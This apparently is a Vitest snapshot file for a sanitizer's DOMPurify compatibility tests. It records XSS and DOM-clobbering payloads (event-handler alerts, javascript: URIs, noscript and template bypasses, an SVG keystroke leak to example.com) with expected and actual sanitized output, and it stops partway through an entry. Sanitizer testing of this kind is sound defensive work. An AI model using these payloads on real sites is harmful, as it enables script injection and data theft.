// Vitest Snapshot v1, https://vitest.dev/guide/snapshot.html

exports[`dompurify compatibility > &gt;style&lt; > &gt;style&lt; 1`] = `
{
  "expected": "",
  "payload": "<style>*{color: red}</style>",
  "result": "<style>*{color: red}</style>",
}
`;

exports[`dompurify compatibility > 65 > 65 1`] = `
{
  "expected": "<div id="11"><svg xmlns="http://www.w3.org/2000/svg"><g></g></svg>//["'\`--&gt;]]&gt;]</div>",
  "payload": "<div id="11"><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(11)"></g></svg>//["'\`-->]]>]</div>",
  "result": "<div id="11"><svg xmlns="http://www.w3.org/2000/svg"></svg>//["'\`--&gt;]]&gt;]</div>",
}
`;

exports[`dompurify compatibility > 81 > 81 1`] = `
{
  "expected": "<div id="27"><style>p[foo=bar{}*{-o-link:'javascript:alert(27)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>//["'\`--&gt;]]&gt;]</div><div id="28">1&gt;//["'\`--&gt;]]&gt;]</div>",
  "payload": "<div id="27"><style>p[foo=bar{}*{-o-link:'javascript:alert(27)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>//["'\`-->]]>]</div><div id="28">1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2)  attributename=innerhtml values=<img/src="."onerror=alert(28)>>//["'\`-->]]>]</div>",
  "result": "<div id="27">//["'\`--&gt;]]&gt;]</div><div id="28">1&gt;//["'\`--&gt;]]&gt;]</div>",
}
`;

exports[`dompurify compatibility > 95 > 95 1`] = `
{
  "expected": "<div id="41"><li style="list-style:url()"></li></div>",
  "payload": "<div id="41"><li style=list-style:url() onerror=alert(41)></li>",
  "result": "<div id="41"></div>",
}
`;

exports[`dompurify compatibility > 99 > 99 1`] = `
{
  "expected": "Hello
//["'\`--&gt;]]&gt;]",
  "payload": "<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style type="text/css">
@font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";}
</style>
</head>
<body>Hello</body>
</html>//["'\`-->]]>]</div>",
  "result": "<style type="text/css">
@font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";}
</style>

Hello
//["'\`--&gt;]]&gt;]",
}
`;

exports[`dompurify compatibility > 100 > 100 1`] = `
{
  "expected": "<div id="44"><style>*[{}@import'test.css?]{color: green;}</style>X//["'\`--&gt;]]&gt;]</div>",
  "payload": "<div id="44"><style>*[{}@import'test.css?]{color: green;}</style>X//["'\`-->]]>]</div>",
  "result": "<div id="44">X//["'\`--&gt;]]&gt;]</div>",
}
`;

exports[`dompurify compatibility > 111 > 111 1`] = `
{
  "expected": "<div id="55"><video><source>//["'\`--&gt;]]&gt;]</video></div>",
  "payload": "<div id="55"><video><source onerror="alert(55)">//["'\`-->]]>]</div>",
  "result": "<div id="55"><video>//["'\`--&gt;]]&gt;]</video></div>",
}
`;

exports[`dompurify compatibility > 112 > 112 1`] = `
{
  "expected": "<div id="56"><video><source></video>//["'\`--&gt;]]&gt;]</div>",
  "payload": "<div id="56"><video onerror="alert(56)"><source></source></video>//["'\`-->]]>]</div>",
  "result": "<div id="56"><video></video>//["'\`--&gt;]]&gt;]</div>",
}
`;

exports[`dompurify compatibility > 121 > 121 1`] = `
{
  "expected": "//["'\`--&gt;]]&gt;]
<div id="67">
]&gt;<img>//["'\`--&gt;]]&gt;]</div>",
  "payload": "<?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(66)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?>
<root/>//["'\`-->]]>]</div>
<div id="67"><!DOCTYPE x [
    <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx"
 onerror CDATA "alert(67)"
 onload CDATA "alert(2)">
]><img />//["'\`-->]]>]</div>",
  "result": "//["'\`--&gt;]]&gt;]

]&gt;//["'\`--&gt;]]&gt;]",
}
`;

exports[`dompurify compatibility > 139 > 139 1`] = `
{
  "expected": "<div id="86"><input>//["'\`--&gt;]]&gt;]</div><div id="87"><svg xmlns="http://www.w3.org/2000/svg">
<a xmlns:xlink="http://www.w3.org/1999/xlink"><rect fill="white" height="1000" width="1000"></rect></a>
</svg>//["'\`--&gt;]]&gt;]</div>",
  "payload": "<div id="86"><body oninput=alert(86)><input autofocus>//["'\`-->]]>]</div><div id="87"><svg xmlns="http://www.w3.org/2000/svg">
<a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(87)"><rect width="1000" height="1000" fill="white"/></a>
</svg>//["'\`-->]]>]</div>",
  "result": "<div id="86"><input>//["'\`--&gt;]]&gt;]</div><div id="87"><svg xmlns="http://www.w3.org/2000/svg">

</svg>//["'\`--&gt;]]&gt;]</div>",
}
`;

exports[`dompurify compatibility > 146 > 146 1`] = `
{
  "expected": [
    "<div id="95"><svg xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">
<feImage>

</feImage>
</svg>//["'\`--&gt;]]&gt;]</div>",
    "<div id="95"><svg xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">

<feImage>

</feImage>

</svg>//["'\`--&gt;]]&gt;]</div>",
    "<div id="95"><svg xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg">
<feImage>

</feImage>
</svg>//["'\`--&gt;]]&gt;]</div>",
  ],
  "payload": "<div id="95"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<feImage>
<set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64,
PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/>
</feImage>
</svg>//["'\`-->]]>]</div>",
  "result": "<div id="95"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">



</svg>//["'\`--&gt;]]&gt;]</div>",
}
`;

exports[`dompurify compatibility > 157 > 157 1`] = `
{
  "expected": [
    "<div id="109"><svg xmlns="http://www.w3.org/2000/svg">
<a id="x"><rect height="1000" width="1000" fill="white"></rect></a>
<rect style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);" fill="white"></rect>
</svg>//["'\`--&gt;]]&gt;]</div>",
    "<div id="109"><svg xmlns="http://www.w3.org/2000/svg">
<a id="x"><rect fill="white" width="1000" height="1000" /></a>
<rect style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);" fill="white" />
</svg>//["'\`--&gt;]]&gt;]</div>",
    "<div id="109"><svg xmlns="http://www.w3.org/2000/svg">
<a id="x"><rect fill="white" width="1000" height="1000" FILL="white" /></a>
<rect style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);" fill="white" FILL="white" />
</svg>//["'\`--&gt;]]&gt;]</div>",
    "<div id="109"><svg xmlns="http://www.w3.org/2000/svg">
<a id="x"><rect fill="white" width="1000" height="1000" /></a>
<rect style="filter: url(&quot;#c&quot;); clip-path: url(&quot;test3.svg#a&quot;); fill: url(#b); marker-end: url(&quot;#d&quot;); marker-mid: url(&quot;#d&quot;); marker-start: url(&quot;#d&quot;); mask: url(&quot;#e&quot;); stroke: url(#f);" fill="white" />
</svg>//["'\`--&gt;]]&gt;]</div>",
    "<div id="109"><svg xmlns="http://www.w3.org/2000/svg">
<a id="x"><rect fill="white" width="1000" height="1000" /></a>
<rect style="clip-path: url(&quot;test3.svg#a&quot;); fill: url(#b); marker-end: url(&quot;#d&quot;); marker-mid: url(&quot;#d&quot;); marker-start: url(&quot;#d&quot;); mask: url(&quot;#e&quot;); stroke: url(#f);" fill="white" />
</svg>//["'\`--&gt;]]&gt;]</div>",
  ],
  "payload": "<div id="109"><svg xmlns="http://www.w3.org/2000/svg">
<a id="x"><rect fill="white" width="1000" height="1000"/></a>
<rect  fill="white" style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);"/>
</svg>//["'\`-->]]>]</div>",
  "result": "<div id="109"><svg xmlns="http://www.w3.org/2000/svg">


</svg>//["'\`--&gt;]]&gt;]</div>",
}
`;

exports[`dompurify compatibility > 158 > 158 1`] = `
{
  "expected": [
    "<div id="110"><svg xmlns="http://www.w3.org/2000/svg">
<path style="marker-start:url(test4.svg#a)" d="M0,0"></path>
</svg>//["'\`--&gt;]]&gt;]</div>",
    "<div id="110"><svg xmlns="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg">
<path style="marker-start: url(&quot;test4.svg#a&quot;);" d="M 0 0" />
</svg>//["'\`--&gt;]]&gt;]</div>",
    "<div id="110"><svg xmlns="http://www.w3.org/2000/svg">
<path style="marker-start:url(test4.svg#a)" d="M 0 0" />
</svg>//["'\`--&gt;]]&gt;]</div>",
    "<div id="110"><svg xmlns="http://www.w3.org/2000/svg">
<path style="marker-start: url(&quot;test4.svg#a&quot;);" d="M 0 0" />
</svg>//["'\`--&gt;]]&gt;]</div>",
  ],
  "payload": "<div id="110"><svg xmlns="http://www.w3.org/2000/svg">
<path d="M0,0" style="marker-start:url(test4.svg#a)"/>
</svg>//["'\`-->]]>]</div>",
  "result": "<div id="110"><svg xmlns="http://www.w3.org/2000/svg">

</svg>//["'\`--&gt;]]&gt;]</div>",
}
`;

exports[`dompurify compatibility > 172 > 172 1`] = `
{
  "expected": [
    "<div id="125">]&gt;<svg xmlns="http://www.w3.org/2000/svg">        <circle r="40" fill="red"></circle></svg>//["'\`--&gt;]]&gt;]</div>",
    "<div id="125">]&gt;<svg xmlns="http://www.w3.org/2000/svg">                                        <circle r="40" fill="red"></circle></svg>//["'\`--&gt;]]&gt;]</div>",
    "<div id="125">]&gt;<svg xmlns="http://www.w3.org/2000/svg">        <circle fill="red" r="40" /></svg>//["'\`--&gt;]]&gt;]</div>",
    "<div id="125">]&gt;<svg xmlns="http://www.w3.org/2000/svg">                                        <circle fill="red" r="40" /></svg>//["'\`--&gt;]]&gt;]</div>",
    "<div id="125">]&gt;//["'\`--&gt;]]&gt;]</div>",
  ],
  "payload": "<div id="125"><?xml version="1.0"?><?xml-stylesheet type="text/xml" href="#stylesheet"?><!DOCTYPE doc [<!ATTLIST xsl:stylesheet  id    ID    #REQUIRED>]><svg xmlns="http://www.w3.org/2000/svg">    <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">        <xsl:template match="/">            <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(125)"></iframe>        </xsl:template>    </xsl:stylesheet>    <circle fill="red" r="40"></circle></svg>//["'\`-->]]>]</div>",
  "result": "<div id="125">]&gt;<svg xmlns="http://www.w3.org/2000/svg">                                        <circle fill="red" r="40"></circle></svg>//["'\`--&gt;]]&gt;]</div>",
}
`;

exports[`dompurify compatibility > 174 > 174 1`] = `
{
  "expected": [
    "<div id="127"><svg id="x" xmlns="http://www.w3.org/2000/svg">

alert(127)
</svg>//["'\`--&gt;]]&gt;]</div>",
    "<div id="127"><svg id="x" xmlns="http://www.w3.org/2000/svg">


</svg>//["'\`--&gt;]]&gt;]</div>",
  ],
  "payload": "<div id="127"><svg xmlns="http://www.w3.org/2000/svg" id="x">
<listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/>
<handler id="y">alert(127)</handler>
</svg>//["'\`-->]]>]</div>",
  "result": "<div id="127"><svg xmlns="http://www.w3.org/2000/svg" id="x">

alert(127)
</svg>//["'\`--&gt;]]&gt;]</div>",
}
`;

exports[`dompurify compatibility > 175 > 175 1`] = `
{
  "expected": [
    "<div id="128"><svg><style></style></svg><img src="x">//["'\`--&gt;]]&gt;]</div>",
    "<div id="128"><svg><style><img src="x">//["'\`--&gt;]]&gt;]</img></style></svg></div>",
    "<div id="128"><svg><style><img src="x"></style></svg></div>",
  ],
  "payload": "<div id="128"><svg><style><img/src=x onerror=alert(128)// </b>//["'\`-->]]>]</div>",
  "result": "<div id="128"><svg></svg><img src="x" b="">//["'\`--&gt;]]&gt;]</div>",
}
`;

exports[`dompurify compatibility > 178 > 178 1`] = `
{
  "expected": [
    "<div id="132">
<form>
<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>
<br>
<input type="password" name="secret">
</form>
<svg height="50px">
<image xmlns:xlink="http://www.w3.org/1999/xlink">




</image>
</svg>//["'\`--&gt;]]&gt;]</div>",
    "<div id="132">
<form>
<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>
<br>
<input name="secret" type="password">
</form>
<svg height="50px">
<image xmlns:xlink="http://www.w3.org/1999/xlink">




</image>
</svg>//["'\`--&gt;]]&gt;]</div>",
  ],
  "payload": "<div id="132"><!doctype html>
<form>
<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>
<br>
<input name="secret" type="password">
</form>
<!-- injection --><svg height="50px">
<image xmlns:xlink="http://www.w3.org/1999/xlink">
<set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" />
<set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" />
<set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" />
<set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" />
</image>
</svg>//["'\`-->]]>]</div>",
  "result": "<div id="132">
<form>
<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>
<br>
<input name="secret" type="password">
</form>
<svg height="50px">






</svg>//["'\`--&gt;]]&gt;]</div>",
}
`;

exports[`dompurify compatibility > 182 > 182 1`] = `
{
  "expected": [
    "<div id="136"><form method="post" action="x">
<input value="admin" name="username">
<input value="secret" type="password" name="password">
<input value="injected" name="injected">
<input type="submit">
</form>//["'\`--&gt;]]&gt;]</div>",
    "<div id="136"><form method="post" action="x">
<input value="admin" name="username">
<input value="secret" name="password" type="password">
<input value="injected" name="injected">
<input type="submit">
</form>//["'\`--&gt;]]&gt;]</div>",
  ],
  "payload": "<div id="136"><form action="x" method="post">
<input name="username" value="admin" />
<input name="password" type="password" value="secret" />
<input name="injected" value="injected" dirname="password" />
<input type="submit">
</form>//["'\`-->]]>]</div>",
  "result": "<div id="136"><form action="x" method="post">
<input name="username" value="admin">
<input name="password" type="password" value="secret">
<input name="injected" value="injected" dirname="password">
<input type="submit">
</form>//["'\`--&gt;]]&gt;]</div>",
}
`;

exports[`dompurify compatibility > Avoid over-zealous stripping of SVG filter elements (see #144) > Avoid over-zealous stripping of SVG filter elements (see #144) 1`] = `
{
  "expected": "<svg><defs><filter id="f1"><feGaussianBlur stdDeviation="15" in="SourceGraphic"></feGaussianBlur></filter></defs><rect filter="url(#f1)" fill="yellow" stroke-width="3" stroke="green" height="90" width="90"></rect></svg>",
  "payload": "<svg><defs><filter id="f1"><feGaussianBlur in="SourceGraphic" stdDeviation="15" /></filter></defs><rect width="90" height="90" stroke="green" stroke-width="3" fill="yellow" filter="url(#f1)" /></svg>",
  "result": "<svg><defs><filter id="f1"></filter></defs></svg>",
}
`;

exports[`dompurify compatibility > Bypass using DOM bugs when dealing with JS URIs in arbitrary attributes (II) > Bypass using DOM bugs when dealing with JS URIs in arbitrary attributes (II) 1`] = `
{
  "expected": "<form><hr><label>This is a searchable index. Enter search keywords: <input label="variation of bypass by @giutro" name="isindex"></label><hr></form>",
  "payload": "<isindex x="javascript:" onmouseover="alert(1)" label="variation of bypass by @giutro">",
  "result": "",
}
`;

exports[`dompurify compatibility > Bypass using event handlers and unknown attributes > Bypass using event handlers and unknown attributes 1`] = `
{
  "expected": "<button>@giutro</button>",
  "payload": "<button remove=me onmousedown="javascript:alert(1);" onclick="javascript:alert(1)" >@giutro",
  "result": "<button remove="me">@giutro</button>",
}
`;

exports[`dompurify compatibility > Bypass using multiple unknown attributes > Bypass using multiple unknown attributes 1`] = `
{
  "expected": "<div>@superevr</div>",
  "payload": "<div onmouseout="javascript:alert(/superevr/)" x=yscript: n>@superevr</div>",
  "result": "<div n="">@superevr</div>",
}
`;

exports[`dompurify compatibility > Bypass using unknown attributes III > Bypass using unknown attributes III 1`] = `
{
  "expected": "<div>text</div>",
  "payload": "<div wow=removeme onmouseover=alert(1)>text",
  "result": "<div wow="removeme">text</div>",
}
`;

exports[`dompurify compatibility > Bypass using unknown attributes V > Bypass using unknown attributes V 1`] = `
{
  "expected": "<form><hr><label>This is a searchable index. Enter search keywords: <input name="isindex" label="bypass by @giutro"></label><hr></form>",
  "payload": "<isindex src="javascript:" onmouseover="alert(1)" label="bypass by @giutro" />",
  "result": "",
}
`;

exports[`dompurify compatibility > DOM Clobbering against an empty cookie > DOM Clobbering against an empty cookie 1`] = `
{
  "expected": "<img src="x">",
  "payload": "<img src=x name=cookie>",
  "result": "<img src="x" name="cookie">",
}
`;

exports[`dompurify compatibility > DOM Clobbering against document.createElement() (see #47) > DOM Clobbering against document.createElement() (see #47) 1`] = `
{
  "expected": "<img src="x"><img src="y">",
  "payload": "<img src=x name=createElement><img src=y id=createElement>",
  "result": "<img src="x" name="createElement"><img src="y" id="createElement">",
}
`;

exports[`dompurify compatibility > DOM clobbering XSS by @irsdl using attributes > DOM clobbering XSS by @irsdl using attributes 1`] = `
{
  "expected": [
    "",
    "<form><input><input></form>",
  ],
  "payload": "<form onmouseover='alert(1)'><input name="attributes"><input name="attributes">",
  "result": "<form><input name="attributes"><input name="attributes"></form>",
}
`;

exports[`dompurify compatibility > DOM clobbering attack using activeElement > DOM clobbering attack using activeElement 1`] = `
{
  "expected": "<img><svg></svg>",
  "payload": "<image name=activeElement><svg onload=alert(1)>",
  "result": "<img name="activeElement"><svg></svg>",
}
`;

exports[`dompurify compatibility > DOM clobbering attack using name=body > DOM clobbering attack using name=body 1`] = `
{
  "expected": "<img><img>@mmrupp<img><svg></svg>",
  "payload": "<image name=body><image name=adoptNode>@mmrupp<image name=firstElementChild><svg onload=alert(1)>",
  "result": "<img name="body"><img name="adoptNode">@mmrupp<img name="firstElementChild"><svg></svg>",
}
`;

exports[`dompurify compatibility > DOM clobbering attack using name=body and injecting SVG + keygen > DOM clobbering attack using name=body and injecting SVG + keygen 1`] = `
{
  "expected": "<img><img src="x"><svg>, </svg>",
  "payload": "<image name=body><img src=x><svg onload=alert(1); autofocus>, <keygen onfocus=alert(1); autofocus>",
  "result": "<img name="body"><img src="x"><svg>, </svg>",
}
`;

exports[`dompurify compatibility > DOM clobbering: acceptCharset > DOM clobbering: acceptCharset 1`] = `
{
  "expected": "<input>123",
  "payload": "<input name=acceptCharset>123",
  "result": "<input name="acceptCharset">123",
}
`;

exports[`dompurify compatibility > DOM clobbering: getElementById > DOM clobbering: getElementById 1`] = `
{
  "expected": "<img src="x">",
  "payload": "<img src=x name=getElementById>",
  "result": "<img src="x" name="getElementById">",
}
`;

exports[`dompurify compatibility > DOM clobbering: hasChildNodes > DOM clobbering: hasChildNodes 1`] = `
{
  "expected": "<form><input></form>",
  "payload": "<form><input name=hasChildNodes>",
  "result": "<form><input name="hasChildNodes"></form>",
}
`;

exports[`dompurify compatibility > DOM clobbering: location > DOM clobbering: location 1`] = `
{
  "expected": "<a href="#some-code-here">invisible</a>",
  "payload": "<a href="#some-code-here" id="location">invisible",
  "result": "<a href="#some-code-here" id="location">invisible</a>",
}
`;

exports[`dompurify compatibility > DOM clobbering: submit > DOM clobbering: submit 1`] = `
{
  "expected": "<input>123",
  "payload": "<input name=submit>123",
  "result": "<input name="submit">123",
}
`;

exports[`dompurify compatibility > Don't remove ARIA attributes if not prohibited (see #203) > Don't remove ARIA attributes if not prohibited (see #203) 1`] = `
{
  "expected": "<div class="msg" role="dialog" aria-labelledby="msg--title"><button type="button" aria-label="close" class="modal-close"><i class="icon-close"></i>some button</button></div>",
  "payload": "<div aria-labelledby="msg--title" role="dialog" class="msg"><button class="modal-close" aria-label="close" type="button"><i class="icon-close"></i>some button</button></div>",
  "result": "<div aria-labelledby="msg--title" role="dialog" class="msg"><button class="modal-close" aria-label="close" type="button">some button</button></div>",
}
`;

exports[`dompurify compatibility > Don't remove binary attributes if considered safe (see #168) > Don't remove binary attributes if considered safe (see #168) 1`] = `
{
  "expected": "<input checked="" type="checkbox"><input type="checkbox">",
  "payload": "<input type=checkbox checked><input type=checkbox onclick>",
  "result": "<input type="checkbox" checked=""><input type="checkbox">",
}
`;

exports[`dompurify compatibility > Don't remove data URIs from SVG images (see #205) > Don't remove data URIs from SVG images (see #205) 1`] = `
{
  "expected": "<svg><image style="border-color: rgb(51, 51, 51); box-sizing: border-box; color: rgb(51, 51, 51); cursor: move; font-family: sans-serif; font-size: 14px; line-height: 20px; outline-color: rgb(51, 51, 51); text-size-adjust: 100%; column-rule-color: rgb(51, 51, 51); -webkit-font-smoothing: antialiased; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); -webkit-text-emphasis-color: rgb(51, 51, 51); -webkit-text-fill-color: rgb(51, 51, 51); -webkit-text-stroke-color: rgb(51, 51, 51); user-select: none; vector-effect: non-scaling-stroke;" xlink:href="data:image/svg+xml;utf8,%3Csvg%20viewBox%3D%220%200%20100%20100%22%20height%3D%22100%22%20width%3D%22100%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20data-name%3D%22Layer%201%22%20id%3D%22Layer_1%22%3E%0A%20%20%3Ctitle%3ECompute%3C%2Ftitle%3E%0A%20%20%3Cg%3E%0A%20%20%20%20%3Crect%20fill%3D%22%239d5025%22%20ry%3D%229.12%22%20rx%3D%229.12%22%20height%3D%2253%22%20width%3D%2253%22%20y%3D%2224.74%22%20x%3D%2223.5%22%3E%3C%2Frect%3E%0A%20%20%20%20%3Crect%20fill%3D%22%23f58536%22%20ry%3D%229.12%22%20rx%3D%229.12%22%20height%3D%2253%22%20width%3D%2253%22%20y%3D%2222.26%22%20x%3D%2223.5%22%3E%3C%2Frect%3E%0A%20%20%3C%2Fg%3E%0A%3C%2Fsvg%3E" xmlns:xlink="http://www.w3.org/1999/xlink" height="500" width="500" id="v-146"></image></svg>",
  "payload": "<svg><image id="v-146" width="500" height="500" xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="data:image/svg+xml;utf8,%3Csvg%20viewBox%3D%220%200%20100%20100%22%20height%3D%22100%22%20width%3D%22100%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20data-name%3D%22Layer%201%22%20id%3D%22Layer_1%22%3E%0A%20%20%3Ctitle%3ECompute%3C%2Ftitle%3E%0A%20%20%3Cg%3E%0A%20%20%20%20%3Crect%20fill%3D%22%239d5025%22%20ry%3D%229.12%22%20rx%3D%229.12%22%20height%3D%2253%22%20width%3D%2253%22%20y%3D%2224.74%22%20x%3D%2223.5%22%3E%3C%2Frect%3E%0A%20%20%20%20%3Crect%20fill%3D%22%23f58536%22%20ry%3D%229.12%22%20rx%3D%229.12%22%20height%3D%2253%22%20width%3D%2253%22%20y%3D%2222.26%22%20x%3D%2223.5%22%3E%3C%2Frect%3E%0A%20%20%3C%2Fg%3E%0A%3C%2Fsvg%3E" preserveratio="true" style="border-color: rgb(51, 51, 51); box-sizing: border-box; color: rgb(51, 51, 51); cursor: move; font-family: sans-serif; font-size: 14px; line-height: 20px; outline-color: rgb(51, 51, 51); text-size-adjust: 100%; column-rule-color: rgb(51, 51, 51); -webkit-font-smoothing: antialiased; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); -webkit-text-emphasis-color: rgb(51, 51, 51); -webkit-text-fill-color: rgb(51, 51, 51); -webkit-text-stroke-color: rgb(51, 51, 51); user-select: none; vector-effect: non-scaling-stroke;"></image></svg>",
  "result": "<svg></svg>",
}
`;

exports[`dompurify compatibility > Don't remove data URIs from SVG images, with href attribute > Don't remove data URIs from SVG images, with href attribute 1`] = `
{
  "expected": "<svg><image style="border-color: rgb(51, 51, 51); box-sizing: border-box; color: rgb(51, 51, 51); cursor: move; font-family: sans-serif; font-size: 14px; line-height: 20px; outline-color: rgb(51, 51, 51); text-size-adjust: 100%; column-rule-color: rgb(51, 51, 51); -webkit-font-smoothing: antialiased; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); -webkit-text-emphasis-color: rgb(51, 51, 51); -webkit-text-fill-color: rgb(51, 51, 51); -webkit-text-stroke-color: rgb(51, 51, 51); user-select: none; vector-effect: non-scaling-stroke;" href="data:image/svg+xml;utf8,%3Csvg%20viewBox%3D%220%200%20100%20100%22%20height%3D%22100%22%20width%3D%22100%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20data-name%3D%22Layer%201%22%20id%3D%22Layer_1%22%3E%0A%20%20%3Ctitle%3ECompute%3C%2Ftitle%3E%0A%20%20%3Cg%3E%0A%20%20%20%20%3Crect%20fill%3D%22%239d5025%22%20ry%3D%229.12%22%20rx%3D%229.12%22%20height%3D%2253%22%20width%3D%2253%22%20y%3D%2224.74%22%20x%3D%2223.5%22%3E%3C%2Frect%3E%0A%20%20%20%20%3Crect%20fill%3D%22%23f58536%22%20ry%3D%229.12%22%20rx%3D%229.12%22%20height%3D%2253%22%20width%3D%2253%22%20y%3D%2222.26%22%20x%3D%2223.5%22%3E%3C%2Frect%3E%0A%20%20%3C%2Fg%3E%0A%3C%2Fsvg%3E" xmlns:xlink="http://www.w3.org/1999/xlink" height="500" width="500" id="v-146"></image></svg>",
  "payload": "<svg><image id="v-146" width="500" height="500" xmlns:xlink="http://www.w3.org/1999/xlink" href="data:image/svg+xml;utf8,%3Csvg%20viewBox%3D%220%200%20100%20100%22%20height%3D%22100%22%20width%3D%22100%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20data-name%3D%22Layer%201%22%20id%3D%22Layer_1%22%3E%0A%20%20%3Ctitle%3ECompute%3C%2Ftitle%3E%0A%20%20%3Cg%3E%0A%20%20%20%20%3Crect%20fill%3D%22%239d5025%22%20ry%3D%229.12%22%20rx%3D%229.12%22%20height%3D%2253%22%20width%3D%2253%22%20y%3D%2224.74%22%20x%3D%2223.5%22%3E%3C%2Frect%3E%0A%20%20%20%20%3Crect%20fill%3D%22%23f58536%22%20ry%3D%229.12%22%20rx%3D%229.12%22%20height%3D%2253%22%20width%3D%2253%22%20y%3D%2222.26%22%20x%3D%2223.5%22%3E%3C%2Frect%3E%0A%20%20%3C%2Fg%3E%0A%3C%2Fsvg%3E" preserveratio="true" style="border-color: rgb(51, 51, 51); box-sizing: border-box; color: rgb(51, 51, 51); cursor: move; font-family: sans-serif; font-size: 14px; line-height: 20px; outline-color: rgb(51, 51, 51); text-size-adjust: 100%; column-rule-color: rgb(51, 51, 51); -webkit-font-smoothing: antialiased; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); -webkit-text-emphasis-color: rgb(51, 51, 51); -webkit-text-fill-color: rgb(51, 51, 51); -webkit-text-stroke-color: rgb(51, 51, 51); user-select: none; vector-effect: non-scaling-stroke;"></image></svg>",
  "result": "<svg></svg>",
}
`;

exports[`dompurify compatibility > Fixed an exception coming from missing clobbering protection > Fixed an exception coming from missing clobbering protection 1`] = `
{
  "expected": [
    "",
    "<form><input></form>",
  ],
  "payload": "<form><input name=namespaceURI>",
  "result": "<form><input name="namespaceURI"></form>",
}
`;

exports[`dompurify compatibility > Image with data URI src > Image with data URI src 1`] = `
{
  "expected": "<img src="data:image/jpeg,ab798ewqxbaudbuoibeqbla">",
  "payload": "<img src=data:image/jpeg,ab798ewqxbaudbuoibeqbla>",
  "result": "<img>",
}
`;

exports[`dompurify compatibility > Image with data URI src with whitespace > Image with data URI src with whitespace 1`] = `
{
  "expected": "<img src="data:image/jpeg,ab798ewqxbaudbuoibeqbla">",
  "payload": "<img src="
data:image/jpeg,ab798ewqxbaudbuoibeqbla">",
  "result": "<img>",
}
`;

exports[`dompurify compatibility > Img element inside noscript terminated inside attribute > Img element inside noscript terminated inside attribute 1`] = `
{
  "expected": [
    "<b></b>",
    "<b><img src="x">"&gt;</b>",
    "<b><a alt="</noscript><img src=x onerror=alert(1)>"></a></b>",
    "<b><a alt="&lt;/noscript&gt;&lt;img src=x onerror=alert(1)&gt;"></a></b>",
  ],
  "payload": "<b><noscript><a alt="</noscript><img src=x onerror=alert(1)>"></noscript>",
  "result": "<b><noscript><a alt="</noscript><img src=x onerror=alert(1)>"></a></noscript></b>",
}
`;

exports[`dompurify compatibility > Img element inside noscript terminated inside comment > Img element inside noscript terminated inside comment 1`] = `
{
  "expected": "<b></b>",
  "payload": "<b><noscript><!-- </noscript><img src=x onerror=alert(1) --></noscript>",
  "result": "<b><noscript></noscript></b>",
}
`;

exports[`dompurify compatibility > Img element inside shadow DOM template > Img element inside shadow DOM template 1`] = `
{
  "expected": "<template><s><template><s><img src="x">@shafigullin</s></template></s></template>",
  "payload": "<body><template><s><template><s><img src=x onerror=alert(1)>@shafigullin</s></template></s></template>",
  "result": "<template></template>",
}
`;

exports[`dompurify compatibility > Inline SVG (data-uri) > Inline SVG (data-uri) 1`] = `
{
  "expected": [
    "<div id="129"><svg><image style="filter:url(&quot;data:image/svg+xml,&lt;svg xmlns=%22http://www.w3.org/2000/svg%22&gt;&lt;script&gt;parent.alert(129)&lt;/script&gt;&lt;/svg&gt;&quot;)">

</image></svg>//["'\`--&gt;]]&gt;]</div>",
